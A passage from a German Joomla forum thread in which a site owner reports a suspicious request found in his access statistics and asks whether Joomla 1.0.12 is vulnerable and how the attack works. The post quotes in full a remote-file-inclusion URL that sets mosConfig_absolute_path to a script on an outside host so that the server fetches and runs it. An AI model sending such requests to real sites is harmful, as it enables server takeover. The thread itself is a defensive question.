mosConfig_absolute_path Attacke?

calimero · Registriert seit: 12.12.2005

Hallo Leute,

ich habe in einer Joomla Installation in der nicht soo viele Seitenaufrufe sind, mal in JoomlaStats die Seitenaufrufe angesehen, weil ich nach was bestimmtem gesucht habe.

Und habe voll Entsetzen folgendes gesehen:

http://www.domain.de/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xboxchannel.narod.ru/main.txt?

Ich habe jetzt hier im Sicherheitsforum etwas nach gelesen bin mir aber über folgende Fragen nicht sicher.

1. Ist Joomla 1.0.12 gegen solche Attacken sicher?
Falls ja, welche früheren Versionen hätten mit der Attacke Probleme?

2. Wie funktioniert obige Attacke? Sind damit eventuelll 3th Party Komponenten unsicher? wie ich das sehe geht die Attacke ja direkt auf com_content, also Joomla Core. Oder?

Danke!

Themen-Optionen	Thema durchsuchen
Druckbare Version zeigen Diese Seite per E-Mail verschicken	Thema durchsuchen: Erweiterte Suche
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln


calimero Joomlaking Wohnort auf der Karte Registriert seit: 12.12.2005 Ort: Würzburg Beiträge: 516 Bedankte sich: 45 58 Danksagungen in 52 Beiträgen	mosConfig_absolute_path Attacke? Hallo Leute, ich habe in einer Joomla Installation in der nicht soo viele Seitenaufrufe sind, mal in JoomlaStats die Seitenaufrufe angesehen, weil ich nach was bestimmtem gesucht habe. Und habe voll Entsetzen folgendes gesehen: http://www.domain.de/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xboxchannel.narod.ru/main.txt? Ich habe jetzt hier im Sicherheitsforum etwas nach gelesen bin mir aber über folgende Fragen nicht sicher. 1. Ist Joomla 1.0.12 gegen solche Attacken sicher? Falls ja, welche früheren Versionen hätten mit der Attacke Probleme? 2. Wie funktioniert obige Attacke? Sind damit eventuelll 3th Party Komponenten unsicher? wie ich das sehe geht die Attacke ja direkt auf com_content, also Joomla Core. Oder? Danke! __________________ Gruß Theo ------- www.Dein-Franken.de - Dein Franken, das Infoportal für Freizeit und Tourismus www.Franken-Bilderbuch.de - Das fränkische Bilderbuch mit den schönsten Seiten Frankens!